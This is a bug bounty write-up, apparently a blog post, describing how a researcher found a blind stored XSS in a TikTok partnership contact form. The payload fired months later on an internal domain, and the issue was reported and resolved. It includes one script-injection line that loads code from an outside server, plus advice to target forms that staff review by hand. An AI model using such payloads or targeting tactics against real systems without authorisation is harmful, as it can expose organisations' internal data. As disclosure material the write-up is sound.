By skyforbes 
From Contact Form to Internal Vulnerability — A Blind Stored XSS in TikTok’s Sensitive Internal Infrastructure
All due respect and appreciation to the TikTok team for their professional and fair handling of this security report.
This time, our story revolves around a real vulnerability caused by a Blind Stored XSS in the TikTok platform.
September 27, 2024 I began a security assessment on a subdomain owned by TikTok dedicated to managing live streaming — a platform used by verified agencies, creator networks, and internal teams to support creators and live stream operations.
The subdomain offered limited functionality, primarily allowing users to apply for official partnership status.
Given this limited user interaction, one might assume the attack surface is minimal. But this led me to consider a less common but more impactful vector: Blind Stored XSS attacks.
The First Attempt
I tried injecting characters into various form fields:
</ > ' "
'"><script src=https://my-server></script>
But they were all rejected, and the form only accepted plain English characters.
I gave up and submitted the form using my real personal details, without any malicious payloads.
Later, I came across another form — a contact form for partnership inquiries.
I tested various tags and found that the form accepted some and rejected others.
So I crafted a custom Blind XSS payload suitable for this form — and it was successfully submitted.
I documented everything:
- A screenshot of the form containing the payload
- The OTP code I received via WhatsApp
- Another screenshot confirming successful form submission
After that, I ended the test and moved on.
The Surprise — Six Months Later
I received a notification from XSS Hunter indicating that the payload had been executed on an internal TikTok domain, unknown to the public.
I reviewed the details — and was stunned by what I found:
Impact:
The vulnerability resulted in the unauthorized exposure of limited sensitive internal information, system data, and internal project details. If not addressed promptly, this issue could have led to more severe consequences, potentially impacting the organization’s security, privacy, and operational integrity.
I spent two full days analyzing the data and understanding what had happened.
One of the challenges I faced was identifying which form triggered the payload…
How did I pinpoint the exact endpoint responsible for this security issue?
- Since the payload was executed on an internal domain, and I had tested multiple different endpoints, it was difficult to determine the form.
- I searched the leaked data for personal details like my name and email address — but the real clue was the OTP code next to my phone number.
- I checked my phone messages and confirmed that the code was received on September 27, 2024.
That confirmed the payload had been stored for six months before being triggered accidentally by an internal staff member
Key Lessons Learned from This Vulnerability:
- Don’t Send payloads randomly — make sure the form is highly likely to be reviewed manually by internal staff (e.g., official partnership forms), unlike generic feedback or performance forms that are often ignored.
- Document everything — including screenshots of your payload, your personal information, and OTP codes (if any), since they provide irreplaceable proof.
- Keep your documentation for at least a year — execution might occur months later.
- Never underestimate Blind XSS — although rare, discovering it often means it’s already too late, and a serious vulnerability has been triggered. The danger lies in the fact that it typically activates only within sensitive internal environments.
These reflections capture the core lessons from this critical vulnerability. I hope they prove helpful to fellow researchers.
Severity Rating :
The vulnerability was ultimately classified as Medium (6.8 CVSS) by TikTok’s security team.
According to their assessment, this rating was attributed to the high complexity required to exploit the vulnerability, as well as the fact that the attacker had no direct control over when or whether the payload would be executed. Therefore, the “Attack Complexity” vector should be rated as High, in accordance with the CVSS rating.
As a security researcher, I fully agree with TikTok’s classification decision.
This case clearly shows that real-world impact may sometimes extend far beyond what is reflected in a traditional CVSS score.
Thank you very much for reading.
Best regards,
@Ahmed Abd Elrahman
Report:
https://hackerone.com/reports/3037447Timeline:
Reported: March 14, 2025
Resolved: April 28, 2025